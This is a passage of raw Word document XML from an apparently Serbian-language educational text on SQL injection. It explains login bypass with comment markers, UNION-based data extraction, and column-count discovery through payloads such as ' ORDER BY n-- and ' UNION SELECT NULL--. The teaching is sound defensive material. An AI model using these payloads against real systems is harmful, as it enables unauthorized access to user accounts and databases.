        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> deo upita, koji će vratiti više redova, sama funkcija koja sadrži logiku za autentifikaciju u aplikaciji koristi metodu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchone()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, što će vratiti samo jedan red </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S obzirom da prvi red u tabeli </w:t>
      </w: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unutar baze podataka predstavlja administratorski nalog, on će biti prosleđen aplikaciji</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Efikasnost navedenog payload-a je upitna, i kroz primer je pokazano da se na ovaj način ne može doći do bilo kog korisničkog naloga, već da rezultat zavisi od drugih faktora, kao što je redosled u bazi podataka.</w:t>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Sledeće će biti prikazan alternativan payload, koji omogućuje fleksibilnost, vidljiv na slici 6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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313" cy="1022526"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35"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548313" cy="102252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6 - Definisanje korisničkog imena i zaobilaženje potrebe za lozinkom</w:t>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Sada je jasno definisano ciljano korisničko ime, dok se deo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klauzule koji se odnosi na lozinku zaobilazi korišćenjem oznake za početak komentara.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nl8wtf6e5v7c" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3 Otkrivanje podataka iz drugih tabela</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Dosadašnji primeri su se odnosili na slučajeve kada je potrebno zaobići logiku upita koji vraća rezultate iz jedne tabele. Često je korisno iskoristiti SQLi napade za preuzimanje podataka iz drugih tabela, gde se mogu navesti dve kategorije napada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napadi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">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Upiti za informacije o bazi podataka</w:t>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Prva kategorija,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napadi, se odnosi na proširivanje upita korišćenjem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operatora, koji omogućuje kombinovanje rezultata dva ili više </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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izraza. Kategorija koja govori o prikupljanju informacija o bazi podataka, uključujući njenu šemu i tabele, koristi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napade kao osnovu i kombinuje ih sa postojećim, obično podrazumevanim, tabelama unutar same šeme baze podataka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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nastavku će prvo biti obrađeni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napadi, gde će se govoriti o uslovima koje je potrebno ispuniti za uspešno izvršenje napada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mz3wpm45fxf2" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">napadi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Prilikom kreiranja payload-a koji koristi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator, potrebno je zadovoljiti sledeće uslove:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Svaki </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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izraz, tj. podupit u okviru </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora, mora imati isti broj kolona</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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Pokomponentno, kolone moraju imati kompatibilne tipove podataka</w:t>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Prvi uslov govori da je, prilikom kreiranja napada, prvo potrebno saznati koliko kolona vraća originalni upit koji je potrebno proširiti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operatorom, dok je zbog drugog uslova potrebno uočiti koje kolone u originalnom upitu imaju kompatibilne tipove podataka sa rezultatima kreiranog podupita.</w:t>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cilju jasnijeg predstavljanja metodologije, poglavlje će biti podeljeno u tri logičke celine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Određivanje broja kolona originalnog upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Određivanje kompatibilnih tipova podataka između kolona </w:t>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koji će se odnositi na prethodno spomenute uslove koje nalaže </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator, kao i:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer - demonstracija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napada</w:t>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Style w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jjfdcg8s9lfq" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Određivanje broja kolona originalnog upita</w:t>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Mogući načini za kreiranje payload-a koji će pomoći u otkrivanju broja kolona u originalnoj tabeli su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">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Korišćenje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY n--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> klauzula, gde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počinje od broja 1 i redom se inkrementira dok ne dođe do greške u izvršenju upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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Kreiranje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT NULL--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> podupita, povećavajući broj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parametara redom dok ne dođe do greške u izvršenju upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>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gde bi se greška pojavila kada bi broj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ili broj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parametara premašio broj kolona u tabeli.</w:t>
      </w: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Primeri koji prikazuju ove metode se mogu videti na slikama 7 i 8, proširivanjem payload-a iz poglavlja </w:t>
      </w:r>
      <w:hyperlink w:anchor="_d9y9m9ltqlei">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.2.1 Otkrivanje skrivenih podataka</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, gde su unapređeni payload-i uokvireni crvenom bojom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Treba imati u vidu da je vidljivost izvšenih upita i rezultata koje upiti vraćaju data kao olakšavajuća okolnost prilikom demonstracije, dok u realnom sistemu to ne bi uvek bio slučaj.</w:t>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0188" cy="2340227"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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310188" cy="234022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7 - Korišćenje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> klauzule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">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Prilikom izvršenja upita koji sadrži </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 1--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> klauzulu, rezultati bivaju sortirani po prvoj koloni. Naredni pokušaji bi sadržali klauzulu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> , a zatim </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i redom inkrementirali dok ne dođe do greške u izvršenju upita za </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n=8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ovo govori da je broj kolona koje originalni upit vraća jednak </w:t>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istog rezultata bi se došlo kreiranjem podupita korišćenjem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT NULL--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038" cy="2584427"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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253038" cy="2584427"/>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8 - Određivanje broja kolona formiranjem unije</w:t>
      </w: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Prilikom korišćenja ove metode, upit će se pravilno izvršiti samo u slučaju tačnog poklapanja broja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parametara u podupitu i broja kolona u originalnom upitu.</w:t>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Takođe, kada je ovo slučaj, rezultat će sadržati dodatnu vrstu u kojoj će svaka kolona sadržati vrednost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uokvireno zelenim pravougaonikom na slici 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_826yn3ko4m0f" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Određivanje kompatibilnih tipova podataka između kolona </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">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obzirom da je namera prilikom korišćenja </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
